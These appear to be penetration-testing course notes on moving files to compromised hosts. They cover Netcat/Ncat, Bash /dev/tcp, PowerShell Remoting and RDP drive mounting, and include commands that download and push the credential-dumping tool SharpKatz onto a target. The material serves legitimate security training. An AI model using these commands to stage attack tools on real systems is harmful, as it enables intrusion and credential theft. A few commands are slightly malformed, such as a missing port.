Other File Transfer Methods

# File Transfer with Netcat and Ncat ### Netcat - compromised machine - listening on port 8000 ```python nc -l -p 8000 > SharpKatz.exe ``` ### Ncat - compromised machine - listening on port 8000 we need to specify `--recv-only` to close the connection once the file transfer is finishsed. ```python ncat -l -p --recv-only > SharpKatz.exe ``` ### Netcat - attack host - sending file to compromised machine from our attack host, we’ll connect to the compromised machine on port 8000 using Netcat and send the file `SharpKatz.exe` as input to Netcat. The option `-q 0` will tell Netcat to close the connection once it finishes. That way, we’ll know when the file transfer was completed. ```python wget -q <https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe> # Or using original Netcat nc -q 0 192.169.49.128 8000 < SharpKatz.exe ``` ### Ncat - attack host - sending file to compromised machine By utilizing Ncat, we can opt for `--send-only` rather than `-q` . The `--send-only` flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted. ```python wget -q <https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe> # or using Ncat ncat --send-only 192.168.49.128 8000 < SharpKatz.exe ``` --- Instead of listening on our compromised machine, we can connect to a port on our attack host to perform the file transfer operation. This method is useful in scenarios where there’s a firewall blocking inbound connections. ### Attack host - sending file as input to Netcat ```python sudo nc -l -p 443 -q 0 < SharpKatz.exe ``` ### Compromised machine connect to Netcat to receive the file ```python nc <IP> <PORT> > SharpKatz.exe ``` We can do the same with Ncat ### Attack host - sending file as input to Ncat ```python sudo ncat -l -p 443 --send-only < SharpKatz.exe ``` ### Compromised machine connect to Ncat to receive the file ```python ncat <IP> 443 --recv-only > SharpKatz.exe ``` --- If we don’t have Netcat or Ncat on our compromised machine, Bash supports read/write operations on a pseudo-device file `/dev/TCP` . Writing to this particular file makes Bash open a TCP connection to `host:port` , and this feature may be used for file transfers. ### Netcat - sending file as Input to Netcat or Ncat ```python sudo nc -l -p 443 -q 0 < SharpKatz.exe sudo ncat -l -p 443 --send-only < SharpKatz.exe ``` ### Compromised machine connecting to Netcat using /dev/tcp to receive the file ```python cat < /dev/tcp/<IP>/443 > SharpKatz.exe ``` --- # PowerShell Session File Transfer There may be scenarios where HTTP, HTTPS, or SMB are unavailable. If that’s the case, we can use `PowerShell Remoting` , aka `WinRM` , to perform file transfer operations. PowerShell Remoting allows us to execute scripts or commands on a remote computer using PowerShell sessions. By default enabling PowerShell remoting creates both an HTTP and an HTTPS listener. The listeners run on default ports `TCP/5985` for HTTP and `TCP/5986` for HTTPS. To create a PowerShell Remoting session on a remote computer, we will need administrative access, be a member of the Remote Management Users group, or have explicit permissions for PowerShell Remoting in the session configuration. ### From DC01 - Confirm WinRM port TCP 5985 is open on DATABASE01 - We have a session as `Administrator` in `DC01` , the user has administrative rights on `DATABASE01` , and PowerShell Remoting is enabled. Let’s use `Test-NetConnection` to confirm we can connect to WinRM. ```powershell whoami htb\\administrator hostname DC01 ``` ```powershell Test-NetConnection -ComputerName DATABASE01 -Port 5985 ComputerName : DATABASE01 RemoteAddress : 192.168.1.101 RemotePort : 5985 InterfaceAlias : Ethernet0 SourceAddress : 192.168.1.100 TcpTestSucceeded : True ``` ### Create a PowerShell Remoting Session to DATABASE01 Because this session already has privileges over `DATABASE01` , we don’t need to specify credentials. In the example below, a session is created to the remote computer named `DATABASE01` and stores the results in the variable named `$Session` ```powershell $Session = New-PSSession -ComputerName DATABASE01 ``` ### Copy samplefile.txt from our [localhost](http://localhost) to the DATABASE01 Session ```powershell Copy-Item -Path C:\\samplefile.txt -ToSession $Session -Destination C:\\Users\\Administrator\\Desktop\\ ``` ### Copy DATABASE.txt from DATABASE01 Session to our [Localhost](http://Localhost) ```powershell Copy-Item -Path "C:\\Users\\Administrator\\Desktop\\DATABASE.txt" -Destination C:\\ -FromSession $Session ``` # RDP We can transfer files using RDP by copying and pasting. We can right-click and copy a file from the Windows machine we connect to and paste it into the RDP session. If we are connected from Linux, we can use `xfreerdp` or `rdesktop` . Both allow copy from a target machine to the RDP session, but there may be scenarios where this may not work as expected. As an alternative to copy and paste, we can mount a local resource on the target RDP server. `rdesktop` or `xfreerdp` can be used to expose a local folder in the remote RDP session. ### Mounting a Linux folder using rdesktop ```powershell rdesktop <IP> -d <DOMAIN>-u administrator -p '<PASSWORD>' -r disk:linux='/home/user/rdesktop/files' ``` ### Mounting a Linux folder using xfreerdp ```powershell xfreerdp /v:<IP> /d:<DOMAIN> /u:administrator /p:<PASSWORD> /drive:linux,/home/plaintext/htb/academy/filetransfer ```